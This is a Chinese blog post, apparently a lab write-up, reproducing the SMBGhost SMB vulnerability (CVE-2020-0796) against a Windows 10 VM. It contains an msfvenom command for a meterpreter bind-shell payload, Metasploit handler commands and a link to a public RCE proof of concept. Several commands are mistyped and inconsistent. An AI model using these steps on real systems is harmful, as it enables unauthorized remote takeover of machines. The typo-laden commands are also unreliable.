cve-2020-0796

最新推荐文章于 2024-03-13 09:41:56 发布
最新推荐文章于 2024-03-13 09:41:56 发布
阅读量210 收藏
点赞数
分类专栏: 漏洞复现 文章标签: windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44851362/article/details/114397145
版权

一.漏洞概述

1.漏洞公告显示,SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。攻击者利用该漏洞无须权限即可实现远程代码执行,受黑客攻击的目标系统只需开机在线即可能被入侵。

2.影响范围

 适用于32位系统的Windows 10版本1903

 Windows 10 1903版(用于基于x64的系统)

 Windows 10 1903版(用于基于ARM64的系统)

 Windows Server 1903版(服务器核心安装)

 适用于32位系统的Windows 10版本1909

 Windows 10版本1909(用于基于x64的系统)

 Windows 10 1909版(用于基于ARM64的系统)

 Windows Server版本1909(服务器核心安装)

3.漏洞原理

漏洞发生在srv2.sys中,由于SMB没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法.最终导致整数溢出。

二.漏洞复现

1.漏洞环境:

靶机:win10虚拟机(ipa;172.28.130.181)

攻击机:kali 2020(ip:172.28.130.231)

2.漏洞检测

 

3.本地提权

4.蓝屏测试

  • git下载蓝屏poc,利用Xftp工具上传到kali

  • 安装好依赖
git clone https://github.com/SecureAuthCorp/impacket.git cd impacketpython3 setup.py install

  • 利用脚本进行蓝屏测试

5.kali下生成python版本的反弹shellcode

 

msfvenom -p windows/x64/meterpreter/bind_tcp lport=2333 -f py -o exp.py
  • 查看生成的shellcode

  • 将生成的exp.py代码中的变量buf全部替换成变量USER_PAYLOAD,然后将所有代码粘贴覆盖下面的代码处

  • 漏洞利用,反弹shell


msfconle 
use exploit/multi/hander 
set payload windows/x64/meterpreter/bind_tcp
set lport 2333 
set rhost 172.168.100.3 
run

 

 

 

参考链接:

http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip

https://github.com/chompie1337/SMBGhost_RCE_PoC

 

_wwwyn
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2020-0796-PoC-master.zip
06-11
SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发缓冲区溢出,可能被攻击者利用远程执行任意代码。 SMBV3在通信过程中默认启动压缩/解压缩机制。如下图所示,攻击者在SMB压缩转换包的...
CVE-2020-0796 检测及利用工具1
08-03
- 蓝屏POC (`eerykitty/CVE-2020-0796-PoC`) 可能会导致系统崩溃,从而验证漏洞的存在。 - 本地提权POC (`danigargu/CVE-2020-0796`) 用于在本地环境下绕过权限限制,获取system权限。 - 远程利用代码 (`chompie...
CVE-2020-0729 poc构造记录
r250414958的博客
03-26 548
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 CVE-2020-0729 poc构造记录前言环境构造过程后续参考 前言 提由于想找个样本 研究一下,网上搜索了一番并没有现成的样本,于是打算自己尝试构造一个试试 环境 windows 10 构造过程 先用这个方法构造一个正常的样本 根据已知的漏洞函数我们对其进行分析触发流程 函数首先读取2字节类型,并检查是否已设置VT_ARRAY(0x2000) 然后 该函数检查类型是否为VT_UI4(0x0013),如果不是,则输入swi.
CVE-2020-0796永恒之黑漏洞浅谈与利用
热门推荐
qq_39120795的博客
11-18 1万+
微软发布安全公告披露了一个最新的SMB远程代码执行漏洞(CVE-2020-0796),攻击者利用该漏洞无须权限即可实现远程代码执行,一旦被成功利用,其危害不亚于永恒之蓝,全球 10 万台服务器或成首轮攻击目标。
CVE-2020-0796
m_de_g的博客
10-08 6596
CVE-2020-0796(永恒之黑) 一.对应出现的版本 永恒之黑的对象为采用Windows 10 1903之后的所有终端节点,如Windows家用版、专业版、企业版、教育版,Windows 10 1903 (19H1)、Windows 10 1909、 Windows Server 19H1均为潜在攻击目标,Windows 7不受影响。 原理为由于SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。 首先下载 CVE-2020
CVE-2020-0796:永恒之黑
Foreverlove112的博客
10-01 1167
CVE-2020-0796:永恒之黑
漏洞复现_CVE-2020-0796 永恒之黑漏洞_遇坑_已解决
qq_51550750的博客
06-09 4820
永恒之黑漏洞复现
CVE-2020-0796-Scanner.zip
06-08
CVE-2020-0796批量扫描工具,工具使用说明在压缩保内。
CVE-2020-0796_SMBGhost_RCE_exp.zip
06-05
CVE-2020-0796_SMBGhost_RCE_exp.zip CVE-2020-0796 exp
Windows-SMB-Ghost-CVE-2020-0796漏洞分析1
08-03
Windows SMB Ghost (CVE-2020-0796)漏洞分析】 Windows SMB Ghost漏洞,也称为CVE-2020-0796,是2020年3月微软在其官方SRC(Security Response Center)发布的一个安全公告中所描述的重大安全问题。这个漏洞存在...
CVE-2020-0796 SMB远程代码执行漏洞 分析、验证及加固
Adminxe的博客
05-15 8927
0x01漏洞描述 CVE-2020-0796是存在于微软服务器SMB协议中的一个“蠕虫化”漏洞,该漏洞未包含 在微软本月发布的补丁中,是在补丁的序言中泄露的。目前微软尚未发布任何技术详情,思科Talos团队和Fortinet公司提供了简短概述,目前尚不清楚该漏洞的补丁何时发布。 Fortinet公司指出,该漏洞是“微软 SMB 服务器中的一个缓冲区溢出漏洞”,严重等级为最高评分,“该漏洞由易...
CVE-2020-0796 漏洞分析报告(最详细)
RatOnSea的博客
05-28 9857
CVE-2020-0796 漏洞分析报告 1 漏洞介绍 1.1 名称 微软SMBv3 Client/Server远程代码执行漏洞CVE-2020-0796 1.2 影响范围 Windows 10 Version 1903 for 32-bit Systems Windows 10 Version 1903 for x64-based Systems Windows 10 Version 1903 for ARM64-based Systems Windows Server, Version 1903 (Se
CVE-2020-0796永恒之黑漏洞复现 超详细过程(成功复现)
unlash的博客
10-20 5108
CVE-2020-0796永恒之黑漏洞复现 超详细过程 成功复现 msf监听成功反弹shell 漏洞描述 影响版本 修复建议
SMB-2
H2SO2的专栏
05-14 1330
Samba服务工作原理Samba服务工作原理Samba服务的具体工作过程如图所示。① 首先客户端发送一个SMB negprot请求数据报,并列出它所支持的所有SMB协议版本。服务器收到请求信息后响应请求,并列出希望使用的协议版本。如果没有可使用的协议版本则返回0XFFFFH,结束通信。② 协议确定后,客户端进程向服务器发起一个用户或共享的认证,这个过程是通过发送SesssetupX请求
【漏洞复现】CVE-2020-0796永恒之黑漏洞复现
weixin_67698311的博客
06-18 2392
Windows 10 和Windows Server 2016引入了SMB 3.1.1.本次漏洞源于SMBv3没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。3.使用工具检查靶机是否存在漏洞,检查工具下载地址https://github.com/ollypwn/SMBGhost运行结果如下图,证明靶机存在漏洞,Vulnerable代表目标存在漏洞,可以进行攻击!4.通过IP安全策略屏蔽危险端口,bat执行添加防火墙策略,关闭危险服务。
CVE-2020-0796永恒之黑
qq_45455136的博客
05-22 946
CVE-2020-0796漏洞 CVE-2020-0796介绍 漏洞复现 蓝屏分析
windows10 永恒之黑复现(CVE-2020-0796
qq_53579360的博客
11-13 1474
永恒之黑复现
cve-2020-0796_漏洞分析视角下的CVE20200796漏洞
weixin_40008870的博客
11-23 610
1概述2020年3月10日是微软补丁日,安全社区注意到Microsoft发布并立即删除了有关CVE-2020-0796的信息;2020年3月11日早上,Microsoft发布了可纠正SMBv3协议如何处理特制请求的修补程序;2020年03月12日微软发布安全公告声称Microsoft 服务器消息块 3.1.1 (SMBv3) 协议处理某些请求的方式中存在远程执行代码漏洞。成功利用此漏洞...
CVE-2020-0796漏洞复现
m0_65764670的博客
03-13 625
此漏洞为基于win10 1903基于底层smb的3.1.1版本漏洞("SMB"代表"Server Message Block",是一种用于在计算机之间共享文件、打印机和其他资源的通信协议),此漏洞靶机需开445端口,如未开445端口则无法进行实验。
CVE-2020-0796补丁
最新发布
07-03
CVE-2020-0796是一个安全漏洞的标识符,通常由Common Vulnerabilities and Exposures(公共漏洞及暴露)项目维护。这个特定的漏洞可能涉及到不同的软件产品或服务,但一般来说,它是对某个软件系统的一个严重弱点,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值